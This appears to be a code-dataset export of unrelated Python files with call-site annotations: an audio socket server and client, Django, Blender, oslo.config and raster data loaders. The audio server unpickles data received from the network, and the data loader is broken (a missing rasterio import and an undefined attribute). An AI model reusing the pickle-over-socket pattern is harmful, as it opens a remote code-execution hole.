pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO server starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio server <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
data = "".encode("utf-8")
payload_size = struct.calcsize("L")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer = CHUNK
)
while True:
while len(data) < payload_size:
data += self.sock.recv(81920)
packed_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_size)[0]
while len(data) < msg_size:
data += self.sock.recv(81920)
frame_data = data[:msg_size]
data = data[msg_size:]
frames = pickle.loads(frame_data)
for frame in frames:
self.stream.write(frame, CHUNK)
class Audio_Client(threading.Thread):
def __init__(self ,serverIP, serverPort, serverVersion):
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (serverIP, serverPort)
if serverVersion == 4:
self.sock = socket(AF_INET, SOCK_STREAM)
else:
self.sock = socket(AF_INET6, SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self) :
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO client starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio client <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
print ("remote AUDIO client connected...")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
while self.stream.is_active():
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = self.stream.read(CHUNK)
frames.append(data)
senddata = pickle.dumps(frames)
try:
self.sock.sendall(struct.pack("L", len(senddata)) + senddata)
except:
break | [((37, 8, 37, 39), 'threading.Thread.__init__', 'threading.Thread.__init__', ({(37, 34, 37, 38): 'self'}, {}), '(self)', False, 'import threading\n'), ((44, 17, 44, 34), 'pyaudio.PyAudio', 'pyaudio.PyAudio', ({}, {}), '()', False, 'import pyaudio\n'), ((75, 23, 75, 43), 'struct.calcsize', 'struct.calcsize', ({(75, 39, 75, 42): '"""L"""'}, {}), "('L')", False, 'import struct\n'), ((98, 8, 98, 39), 'threading.Thread.__init__', 'threading.Thread.__init__', ({(98, 34, 98, 38): 'self'}, {}), '(self)', False, 'import threading\n'), ((105, 17, 105, 34), 'pyaudio.PyAudio', 'pyaudio.PyAudio', ({}, {}), '()', False, 'import pyaudio\n'), ((92, 21, 92, 45), 'pickle.loads', 'pickle.loads', ({(92, 34, 92, 44): 'frame_data'}, {}), '(frame_data)', False, 'import pickle\n'), ((146, 23, 146, 43), 'pickle.dumps', 'pickle.dumps', ({(146, 36, 146, 42): 'frames'}, {}), '(frames)', False, 'import pickle\n'), ((87, 23, 87, 54), 'struct.unpack', 'struct.unpack', ({(87, 37, 87, 40): '"""L"""', (87, 42, 87, 53): 'packed_size'}, {}), "('L', packed_size)", False, 'import struct\n'), ((67, 16, 67, 29), 'time.sleep', 'time.sleep', ({(67, 27, 67, 28): '(3)'}, {}), '(3)', False, 'import time\n'), ((128, 16, 128, 29), 'time.sleep', 'time.sleep', ({(128, 27, 128, 28): '(3)'}, {}), '(3)', False, 'import time\n')] |
dennereed/paleocore | gdb/util.py | d6da6c39cde96050ee4b9e7213ec1200530cbeee | from gdb.models import *
| [] |
razortheory/who-iwg-webapp | iwg_blog/blog/views/__init__.py | e2318d286cd9ab87d4d8103bc7b3072cfb99bf76 | from .base import ArticleView, ArticlePreviewView, ArticleListView, SearchView, LandingView, \
CategoryView, TagView, SubscribeForUpdates, UnsubscribeFromUpdates
from .ajax import GetArticleSlugAjax, TagsAutocompleteAjax
from .errors import page_not_found, server_error
| [] |
snake-biscuits/io_import_rbsp | io_import_rbsp/rbsp/rpak_materials.py | 0de47dc70c373cc0417cc222d5d83e6dde72068b | # by MrSteyk & Dogecore
# TODO: extraction instructions & testing
import json
import os.path
from typing import List
import bpy
loaded_materials = {}
MATERIAL_LOAD_PATH = "" # put your path here
# normal has special logic
MATERIAL_INPUT_LINKING = {
"color": "Base Color",
"rough": "Roughness",
"spec": "Specular",
"illumm": "Emission",
}
def load_material_data_from_name(subpath):
full_path = MATERIAL_LOAD_PATH + subpath + ".json"
if not os.path.isfile(full_path):
return False
return json.load(open(full_path, "rb"))
def load_image_from_subpath(subpath):
full_path = MATERIAL_LOAD_PATH + subpath
if not os.path.isfile(full_path):
return False
return bpy.data.images.load(full_path)
def load_materials(bsp) -> List[bpy.types.Material]:
materials = []
for material_name in bsp.TEXTURE_DATA_STRING_DATA:
if material_name in loaded_materials:
materials.append(loaded_materials[material_name])
continue
mat_data = load_material_data_from_name(material_name)
material = bpy.data.materials.new("materials/" + material_name)
if not mat_data:
loaded_materials[material_name] = material
materials.append(material)
# raise ValueError(f"Material data for material {material_name} does not exist!")
continue
# print(material_name, mat_data)
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
# data link
for mat_data_entry in MATERIAL_INPUT_LINKING.keys():
texture_file = mat_data[mat_data_entry]
if texture_file == "":
print(f"Texture type {mat_data_entry} doesn't exist in {material_name}'s material data, skipping.")
continue
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"{material_name}'s texture {texture_file} ({mat_data_entry}) doesn't exist!")
continue
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(bsdf.inputs[MATERIAL_INPUT_LINKING[mat_data_entry]], tex.outputs["Color"])
if mat_data_entry == "color":
material.node_tree.links.new(bsdf.inputs["Alpha"], tex.outputs["Alpha"])
# normal link
if mat_data["normal"] != "":
texture_file = mat_data["normal"]
normalmap = material.node_tree.nodes.new("ShaderNodeNormalMap")
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"Texture {texture_file} for material {material_name} (normal) doesn't exist!")
continue
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(normalmap.inputs["Color"], tex.outputs["Color"])
material.node_tree.links.new(bsdf.inputs["Normal"], normalmap.outputs["Normal"])
loaded_materials[material_name] = material
materials.append(material)
return materials
| [((34, 11, 34, 42), 'bpy.data.images.load', 'bpy.data.images.load', ({(34, 32, 34, 41): 'full_path'}, {}), '(full_path)', False, 'import bpy\n'), ((44, 19, 44, 71), 'bpy.data.materials.new', 'bpy.data.materials.new', ({(44, 42, 44, 70): "'materials/' + material_name"}, {}), "('materials/' + material_name)", False, 'import bpy\n')] |
alldevic/mtauksync | initcmds/models.py | 1a5d325ca8a7878aba5b292d7835546b24bb554c | from django.db import models
TASK_STATUS = (
("c", "created"),
("p", "progress"),
("s", "success"),
("f", "failed")
)
class TaskModel(models.Model):
lastrunned = models.DateTimeField(
"lastrunned", auto_now=False, auto_now_add=False)
taskname = models.CharField("taskname", max_length=50)
status = models.CharField(max_length=1, choices=TASK_STATUS, default='c')
fail = models.TextField("fail", blank=True, null=True)
def __str__(self) -> str:
return f"{self.taskname} - {self.lastrunned}"
class Meta:
verbose_name = "запуск"
verbose_name_plural = "запуски"
| [((12, 17, 13, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((14, 15, 14, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((15, 13, 15, 77), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((16, 11, 16, 58), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n')] |
ttsiouts/aardvark | aardvark/conf/reaper_conf.py | cbf29f332df86814dd581152faf863c0d29ae41c | # Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
reaper_group = cfg.OptGroup(
'reaper',
title='Aardvark Service Options',
help="Configuration options for Aardvark service")
reaper_opts = [
cfg.StrOpt('reaper_driver',
default='chance_driver',
help="""
The driver that the reaper will use
Possible choices:
* strict_driver: The purpose of the preemptibles existence is to eliminate the
idling resources. This driver gets all the possible offers
from the relevant hosts and tries to find the best matching
for the requested resources. The best matching offer is the
combination of preemptible servers that leave the least
possible resources unused.
* chance_driver: A valid host is selected randomly and in a number of
preconfigured retries, the driver tries to find the instances
that have to be culled in order to have the requested
resources available.
"""
),
cfg.IntOpt('alternatives',
default=1,
help="""
The number of alternative slots that the the reaper will try to free up for
each requested slot.
"""
),
cfg.IntOpt('max_attempts',
default=5,
help="""
The number of alternative slots that the the reaper will try to free up for
each requested slot.
"""
),
cfg.ListOpt('watched_aggregates',
default=[],
help="""
The list of aggregate names that the reaper will try to make space to
Each element of the list can be an aggregate or a combination of aggregates.
Combination of aggregates is a single string with a vertical-line-separated
aggregate names.
e.g. watched_aggregates={agg_name1},{agg_name2}|{agg_name3}',....
For each element in the list, a reaper thread will be spawned and the request
will be forwarded to the responsible worker.
If the provided list is empty, only one worker will be spawned, responsible for
the whole system.
"""
),
cfg.StrOpt('job_backend',
default='redis',
choices=('redis', 'zookeeper'),
help="""
The backend to use for distributed task management.
For this purpose the Reaper uses OpenStack Taskflow. The two supported
backends are redis and zookeper.
"""
),
cfg.StrOpt('backend_host',
default='localhost',
help="""
Specifies the host where the job board backend can be found.
"""
),
]
def register_opts(conf):
conf.register_group(reaper_group)
conf.register_opts(reaper_opts, group=reaper_group)
| [((19, 15, 22, 54), 'oslo_config.cfg.OptGroup', 'cfg.OptGroup', (), '', False, 'from oslo_config import cfg\n'), ((26, 4, 45, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n'), ((46, 4, 52, 5), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo_config import cfg\n'), ((53, 4, 59, 5), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo_config import cfg\n'), ((60, 4, 77, 5), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (), '', False, 'from oslo_config import cfg\n'), ((78, 4, 87, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n'), ((88, 4, 93, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n')] |
jhlee93/WNet-cGAN-Keras | src/Data.py | 89666be91083735c3259e04907bbfbe1c89fc8f8 | import glob
import numpy as np
class Data:
def __init__(self, path, random=False):
"""
input:
path: path to the folder with subfolders: DSM, PAN, LABEL
max_num: int, num of samples
random: bool, to load samples randomly or from 0 to num_max
"""
self.DSM = sorted(glob.glob(path+"/DSM/*.tif"))
self.PAN = sorted(glob.glob(path+"/PAN/*.tif"))
self.LABEL = sorted(glob.glob(path+"/LABEL/*.tif"))
if len(self.DSM) != len(self.PAN) or len(self.LABEL) != len(self.PAN):
raise ValueError('DSM, PAN or LABEL do not match')
def get_data(self, start=0, num=10, as_arr=True, random=False):
"""
function: load max_num of XY into lists
output: list of numpy arrays, X (images) and Y (labels)
"""
DSM_out = []
PAN_out = []
LABEL_out = []
if random:
idx = np.random.choice(list(range(len(self.X))), num, replace=False)
print('randomly loading {0} tiles from {1} tiles'.format(num, len(self.DSM)))
else:
idx = list(range(start, start+num))
print('loading {0} - {1} image tiles'.format(start, start+num-1))
for i in idx:
DSM_out.append(np.moveaxis(rasterio.open(self.DSM[i]).read(),0,2))
PAN_out.append(np.moveaxis(rasterio.open(self.PAN[i]).read(),0,2))
LABEL_out.append(np.moveaxis(rasterio.open(self.LABEL[i]).read(),0,2))
DSM_remove = [self.DSM[i] for i in idx]
PAN_remove = [self.PAN[i] for i in idx]
LABEL_remove = [self.LABEL[i] for i in idx]
for i in range(len(DSM_remove)):
self.DSM.remove(DSM_remove[i])
self.PAN.remove(PAN_remove[i])
self.LABEL.remove(LABEL_remove[i])
if as_arr:
return np.asarray(DSM_out), np.asarray(PAN_out), np.asarray(LABEL_out)
else:
return DSM_out, PAN_out, LABEL_out
def split_trn_vld_tst(self, vld_rate=0.2, tst_rate=0.0, random=True, seed=10):
np.random.seed(seed)
num = len(self.DSM)
vld_num = int(num*vld_rate)
tst_num = int(num*tst_rate)
print('split into {0} train, {1} validation, {2} test samples'.format(num-vld_num-tst_num, vld_num, tst_num))
idx = np.arange(num)
if random:
np.random.shuffle(idx)
DSM_tst, PAN_tst, LABEL_tst = [self.DSM[k] for k in idx[:tst_num]], [self.PAN[k] for k in idx[:tst_num]], [self.LABEL[k] for k in idx[:tst_num]]
DSM_vld, PAN_vld, LABEL_vld = [self.DSM[k] for k in idx[tst_num:tst_num+vld_num]], [self.PAN[k] for k in idx[tst_num:tst_num+vld_num]], [self.LABEL[k] for k in idx[tst_num:tst_num+vld_num]]
DSM_trn, PAN_trn, LABEL_trn = [self.DSM[k] for k in idx[tst_num+vld_num:]], [self.PAN[k] for k in idx[tst_num+vld_num:]], [self.LABEL[k] for k in idx[tst_num+vld_num:]]
return DSM_trn, PAN_trn, LABEL_trn, DSM_vld, PAN_vld, LABEL_vld, DSM_tst, PAN_tst, LABEL_tst
| [((55, 8, 55, 28), 'numpy.random.seed', 'np.random.seed', ({(55, 23, 55, 27): 'seed'}, {}), '(seed)', True, 'import numpy as np\n'), ((62, 14, 62, 28), 'numpy.arange', 'np.arange', ({(62, 24, 62, 27): 'num'}, {}), '(num)', True, 'import numpy as np\n'), ((13, 26, 13, 54), 'glob.glob', 'glob.glob', ({(13, 36, 13, 53): "path + '/DSM/*.tif'"}, {}), "(path + '/DSM/*.tif')", False, 'import glob\n'), ((14, 26, 14, 54), 'glob.glob', 'glob.glob', ({(14, 36, 14, 53): "path + '/PAN/*.tif'"}, {}), "(path + '/PAN/*.tif')", False, 'import glob\n'), ((15, 28, 15, 58), 'glob.glob', 'glob.glob', ({(15, 38, 15, 57): "path + '/LABEL/*.tif'"}, {}), "(path + '/LABEL/*.tif')", False, 'import glob\n'), ((64, 12, 64, 34), 'numpy.random.shuffle', 'np.random.shuffle', ({(64, 30, 64, 33): 'idx'}, {}), '(idx)', True, 'import numpy as np\n'), ((50, 19, 50, 38), 'numpy.asarray', 'np.asarray', ({(50, 30, 50, 37): 'DSM_out'}, {}), '(DSM_out)', True, 'import numpy as np\n'), ((50, 40, 50, 59), 'numpy.asarray', 'np.asarray', ({(50, 51, 50, 58): 'PAN_out'}, {}), '(PAN_out)', True, 'import numpy as np\n'), ((50, 61, 50, 82), 'numpy.asarray', 'np.asarray', ({(50, 72, 50, 81): 'LABEL_out'}, {}), '(LABEL_out)', True, 'import numpy as np\n')] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.